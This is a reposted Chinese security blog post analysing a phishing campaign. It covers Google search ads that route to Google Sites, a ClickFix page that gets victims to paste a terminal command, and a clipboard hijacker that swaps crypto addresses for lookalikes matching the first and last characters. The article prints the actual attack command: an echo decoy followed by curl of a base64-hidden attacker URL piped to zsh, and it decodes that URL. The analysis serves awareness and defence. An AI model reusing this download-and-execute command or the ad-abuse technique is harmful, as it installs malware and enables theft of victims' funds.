Google是如何”做”黑产的

admin 2026-07-15 05:14:19 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文章揭示了一种利用GoogleSites和搜索广告的复杂钓鱼攻击手法。攻击者通过Google广告的显示URL与最终URL域名校验漏洞,将钓鱼页面托管在sites.google.com上,并利用ClickFix手法诱导用户手动执行恶意命令,绕过安全防护。该命令通过echo障眼法和base64编码隐藏真实下载地址,最终植入剪贴板木马。木马会替换用户复制的加密货币地址,并通过靓号地址爆破使首尾字符与目标地址匹配,欺骗用户核对。文章强调,攻击利用的是人的信任与习惯,而非技术漏洞,并提供了详细的技术分析与防范建议。 综合评分: 90 文章分类: 社会工程学,恶意软件,红队,安全意识,漏洞分析


cover_image

Google是如何”做”黑产的

DeepPhish

2026年6月10日 18:16 广东

在小说阅读器读本章

去阅读

白服务黑利用。

Google Sites(谷歌免费建站工具)默认发布的地址格式是:sites.google.com/[站点所属Google账号域名]/[站点短名] 页面内容实际托管在 Google 服务器,因此浏览器地址栏显示Google域名+安全图标。

以下文章来源于雪漫山川 ,作者雪漫

雪漫山川 .

聊聊安全,APT,AI,还有各种小道消息

6 月 1 日傍晚,17:30。你拿到新 MacBook Pro 刚刚激活,屏幕亮着你有点新拿到本子的兴奋。你做的第一件事,是装回常用软件。

你想装 Codex。你打开 Google,敲下 codex download,回车。

第一条结果跳了出来。

你不是个莽撞的人,而且你还是安全工程师。你知道网上钓鱼遍地,下载软件最容易被黑产投毒。所以你特意做了一件大多数人懒得做的事,你看了一眼那个地址。地址写着:

business.google.comhttps://business.google.com › codex › get

你心里一松。

Google 自己的域名。你甚至对自己的谨慎有点欣慰,网上多少人就倒在这一步了。

你点了进去,按页面提示一步步操作。一切顺利。

几天后,你准备往钱包里转 20,000 USDC。但你是安全工程师,你做事很谨慎,转账前,你核对了收款地址:开头 0xA20,结尾 7248,对得上。

你点了”确认”。钱再也没回来。

这不是我编的,这是真实发生的故事。

该做的你都做了!用 Google、看域名、核对地址。可你还是丢了两万美元。

于是问题来了:

一个显示着 business.google.com 的链接,怎么会让你下载到黑产团伙的恶意软件?

是这个地址根本是假的?还是 Google 被黑了?

那个 business.google.com,是伪造的吗?

最直觉的解释是:钓鱼网站伪造了 Google 的域名。是,的确有很多g00gle.comgoogle.com-39s93keie-secure.net 这种钓鱼域名。

但这次不是啊。

business.google.com 是 Google 真实的域名。不对不对,google怎么可能下载恶意软件,所以….总不可能是google被黑了吧,说实话,你说google开始做黑产赚钱了,都比google被黑产团伙黑了可信。

真相在这里:显示的URL和跳转的URL并不一样。

Google 搜索广告里有两个字段。一个叫显示 URL就是给你看的那行地址;另一个叫最终 URL,你点下去真正落地的页面。广告主可以分别设置它们。

也就是说, business.google.com › codex › get 里的 codexget,不是真实存在的目录,是攻击者手工构造出来的;而那个”1M+ visitor in the past month”是专门编的词,用来让你联想到”哦,这是 Codex 的获取页, 还有那么多人访问过”,摆给你看换取你的信任。

可你大概立刻会想:Google是傻子么?Google 没规定”显示地址必须和落地地址一致”吗?

你还真说对了,Google 确实有这条规则:显示 URL 和最终 URL 的域名必须匹配,否则广告会被拒。

但!匹配只校验到根域名那一层。

Google 比对的是 google.com 这一级,如果你是攻击者你会怎么做?聪明的你一定想到了,利用sites.google.com来做钓鱼页面,sites.google.com是任何人都能免费建站的平台(Google Sites)。这样一来:

business.google.comsites.google.com

就是”同一个域名”了!

攻击者在上面建了一个页面:

sites.google.com/newpayservices.com/cdx-biz-ver-un-v4

你看,攻击者投放广告时,把最终 URL 填成这个 Google Sites 页面,再把显示 URL 填成 business.google.com两者根域名都是 google.com,完美通过”域名一致”校验,广告审核放行。就是你看到的 business.google.com了。

为什么攻击者不用自己的后面的那个anvil-89.com(记住这个域名后面要考),因为大家都信任google啊,Google自带信任光环。用anvil-89.com那不是一眼假。

你谨慎的”看域名”这个动作,又恰好撞进了攻击者早已设计好的信任陷阱。

但等等!

他又没下载什么可疑文件,木马是从哪进来的?

哎!要不说看官您眼睛最毒呢!这套手法最帅,哦,不是,最阴的地方就是,你不用下载恶意文件。

你想想,你Mac 上但凡来一个来路不明的 .dmg,系统会弹”无法验证开发者”。所以这帮黑产让你自己动手!

那个钓鱼页面,长得像一个正经的终端安装向导,写着三步:

页面上还配了个醒目的 “Copy command” 按钮,看看!服务周到吧贴心吧!

这套手法叫 ClickFix。它的精髓是:不让你下载木马,而是让你亲手执行命令。正是居家旅行杀人灭口必备良药!

因为是用户主动执行的,所以可以绕过了几乎所有自动防护。因为系统不会拦你自己输入的命令。

你再等一下!你这方法骗普通人还行,但那可是安全工程师,不会看这个命令么?当然会看!

可命令开头明明写着官方网址啊!

命令开头是这样的:

echo “Downloading Codex: https://persistent.oaistatic.com/codex-app-prod/Codex.dmg” …

oaistatic.com 是 OpenAI 的域名,没问题吧?这不就是官方么?于是放心粘贴、回车。

等一下!!

请问 echo是什么意思??

echo 这个命令,作用仅仅是”往屏幕上打印一行字”啊。它什么都没下载,什么都没安装。它存在的唯一目的,就是让你在那一两秒里看到一个像官方的网址,你的潜意识告诉你”一切都正常”。

真正干活的,是被截断、被你忽略的后半段:

echo “Downloading Codex: https://persistent.oaistatic.com/codex-app-prod/Codex.dmg”&& curl -s $(echo “aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC9kYjdiZDRjNTU5YWEzZmI5…” | openssl base64 -d -A) | zsh

拆给你看:

&& curl -s $(echo "一长串乱码" | openssl base64 -d -A)

这串”乱码”是 base64 ,解开看一下:

https://anvil-89.com/curl/db7bd4c559aa3fb93d63739f16264aae68c911adc95b9f97cc7529c52fd15a87

一个跟 OpenAI 毫无关系的攻击者域名出现了。

你以为你在”从 oaistatic.com 下载 Codex”。实际上你在”从 anvil-89.com 下载一段脚本并立即运行”。前半句是演给你看的,后半句才是真的。

命令跑完,木马进了系统。

这个木马做了什么?

这个木马很纯粹,它就只负责监视剪贴板,上什么线啊,翻什么文件啊,多累啊,就只监控你的剪贴板,一旦发现复制的内容像一个加密货币钱包地址(比如以太坊的 0x 加 40 位十六进制);它就换成攻击者自己的地址;让你给攻击者转账。

大部分人转账的习惯:复制 → 粘贴 → 不细看 → 转账。没人会细看,也没人会手敲加密货币的地址,多长啊。等你转钱的时候,修改你剪贴板,钱就会发给攻击者了。

检查了转账地址,为什么还是转给攻击者了

但我们的受害者是一个安全工程师。他足够谨慎,下意识的检查了转账地址,如果这个时候,转账地址不一致,一眼就识别出来了。但并没识别出来,为什么?

请你,认真,看下,两个地址:

是的,你想到的,攻击者也想到了,头尾都能对上。只有中间一长段完全不同。钱包界面为了好看,通常把地址缩写成 0xA20...7248 这种”掐头去尾”的样子。

攻击者怎么做到的?很简单,他们用靓号地址爆破(vanity address grinding),提前生成海量地址,专门挑出一个开头 A20、结尾 7248 都能撞上受害者目标地址的,作为收款地址。匹配 3 位前缀加 4 位后缀,运算量很小,普通电脑几分钟就能跑出一个。成本极低,”效果极好”。

于是”核对地址”这个最后的谨慎动作,又一次精准地落进了攻击者布置好的算计里。

你复制的是正确地址,粘贴出来变成了黑客地址,首尾一模一样,中间被掉了包。你点下确认。20,000 USDC 流进了黑客的钱包,再也追不回。

让人难过的是,你的每一个安全常识,都变成了攻击者针对你的陷阱:

你的安全习惯:用 Google 搜索找官方

攻击者的陷阱设计:投放 Google 付费广告抢占第一条

你的安全习惯:看域名,认准google.com

攻击者的陷阱设计:把钓鱼页寄生在 sites.google.com,显示 URL 做成 business.google.com

你的安全习惯:不乱下来路不明的文件

攻击者的陷阱设计:不给文件,用ClickFix骗你把命令粘进终端

你的安全习惯:安装前瞟一眼命令确认

攻击者的陷阱设计:用echo障眼 + base64 藏址 + 命令框截断

你的安全习惯:转账前核对收款地址

攻击者的陷阱设计:剪贴板木马替换 + 靓号撞首尾,骗过”只看首尾”

没有用任何高深的 0day 漏洞,它利用的只是人们的信任和习惯。别看不起这帮人,这其实反而是更高级的攻击方式,因为人的习惯是最难改变的,人的信任是最容易被利用的。


想看我反打这帮团伙,请大家关注、点赞、转发三连,一定要关注啊!!新人起号真的太难了!!求一点鼓励!


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:DeepPhish 《Google是如何”做”黑产的》

推荐两个远程控制开发专栏 网络安全文章

推荐两个远程控制开发专栏

文章总结: 本文推荐两个远程控制开发专栏:用AI带你从零开发大型商业远程控制软件和安全工程专栏导航从银狐源码学安全工程。内容为软文推广,提供学习资源链接,适合对
评论:0   参与:  0